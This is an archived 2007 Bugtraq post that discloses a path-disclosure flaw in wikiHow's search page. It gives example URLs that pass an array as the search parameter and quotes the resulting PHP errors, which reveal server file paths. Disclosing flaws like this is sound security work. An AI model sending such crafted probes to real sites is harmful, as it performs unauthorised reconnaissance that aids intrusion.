| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 20 Jan 2007 23:02:19 -0000 From: iamtheevil1@...il.com To: bugtraq@...urityfocus.com Subject: Wiki-how path disclosure The search function of wikihow is vulnerable to path disclose when an array type is givin as a search parameter. Example: http://www.wikihow.com/Special:LSearch?search[]=pie&fulltext=Search yields: Warning: urlencode() expects parameter 1 to be string, array given in /var/www/html/wiki16/includes/SpecialLSearch.php on line 56 Warning: Illegal offset type in isset or empty in /var/www/html/wiki16/includes/Title.php on line 123 Warning: Illegal offset type in /var/www/html/wiki16/includes/Title.php on line 146 Warning: urlencode() expects parameter 1 to be string, array given in /var/www/html/wiki16/includes/SpecialLSearch.php on line 124 Warning: htmlspecialchars() expects parameter 1 to be string, array given in /var/www/html/wiki16/skins/WikiHowSkin.php on line 1468 Also, when an array is given as a search type, the function Fatal error: Call to a member function getArticleID() yields another path disclose as seen here: http://www.wikihow.com/Special:LSearch?search=%5B%5D&fulltext=Search Fatal error: Call to a member function getArticleID() on a non-object in /var/www/html/wiki16/includes/SpecialLSearch.php on line 91 It is not known at this time if other wiki systems are vulnerable to the same thing. If it is, drop me a line.
Powered by blists - more mailing lists